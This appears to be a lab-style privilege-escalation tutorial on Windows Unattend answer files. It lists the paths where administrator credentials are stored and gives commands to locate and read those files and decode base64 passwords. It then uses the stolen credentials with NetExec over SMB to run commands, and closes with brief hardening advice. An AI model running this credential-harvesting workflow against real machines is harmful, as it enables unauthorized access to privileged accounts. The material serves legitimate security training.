Unattend files, also commonly referred to as "Answer files" in the context of Windows installations, are XML-based configuration files aimed at optimizing the installation process. These files contain an extensive range of settings and configurations, empowering unattended or automated installation procedures.
An adversary could potentially exploit Unattend files by reading their contents to obtain encoded passwords and gain unauthorized access to privileged accounts or sensitive resources.
The following locations commonly contain answer files that may include local administrator credentials:
C:\Windows\Panther\unattend.xmlC:\Windows\Panther\Unattend\unattend.xmlC:\Windows\System32\Sysprep\unattend.xmlC:\Windows\System32\Sysprep\sysprep.xmlC:\Windows\System32\Sysprep\Panther\unattend.xmlC:\Windows\sysprep.infC:\Windows\unattend.xmlC:\unattend.xmlC:\sysprep.inf
- Open a PowerShell with local Administrator privileges and run the following command to create a new folder:
mkdir "C:\Windows\Panther\Unattend\"
- Download the file unattend.xml to the 'C:\Windows\Panther\Unattend' directory.
Outcome:
To set up the lab with the 'Answer files (Unattend files)' scenario use the custom PowerShell script named AnswerFiles.ps1.
Open a PowerShelll with local Administrator privileges and run the script:
.\AnswerFiles.ps1
Outcome:
To perform manual enumeration and identify if there are any answer files that may contain useful credentials, you can use the following PowerShell command:
Write-Host `n;foreach ($file in @('C:\Windows\Panther\unattend.xml', 'C:\Windows\Panther\Unattend\unattend.xml', 'C:\Windows\System32\Sysprep\unattend.xml', 'C:\Windows\System32\Sysprep\sysprep.xml', 'C:\Windows\System32\Sysprep\Panther\unattend.xml', 'C:\Windows\sysprep.inf', 'C:\Windows\unattend.xml', 'C:\unattend.xml', 'C:\sysprep.inf')) { if (Test-Path $file) { Write-Host "[+] $file" } }; Write-Host `n
Outcome:
To run the SharpUp tool and perform an enumeration of the Answer files (Unattend files), you can execute the following command with appropriate arguments:
SharpUp.exe audit UnattendedInstallFiles
Outcome:
- Read the content of the found answer file:
type C:\Windows\Panther\Unattend\Unattend.xml
Outcome:
- To decode the base64 password field, use the following command from your Linux attacking machine:
echo "<base64 string>" | base64 -d
Outcome:
- Obtaining the credentials can be accomplished through several methods, which you can then utilize to elevate privileges if these credentials are valid.
Some of the common services are:
- Remote Desktop Protocol (RDP)
- Windows Remote Management (WinRM) (If it is enabled)
- Server Message Block (SMB)
- Windows Management Instrumentation (WMI)
- Virtual Network Computing (VNC) (If it is enabled)
To identify a valid authentication method, you can use NetExec.
This is an example of using the SMB service to authenticate against the workstation and execute a command:
nxc smb <ip> -u <username> -p '<password>' -x whoami
Outcome:
Please ensure that password fields utilize strong encryption formats, or consider removing them if they are not necessary for the use of these files.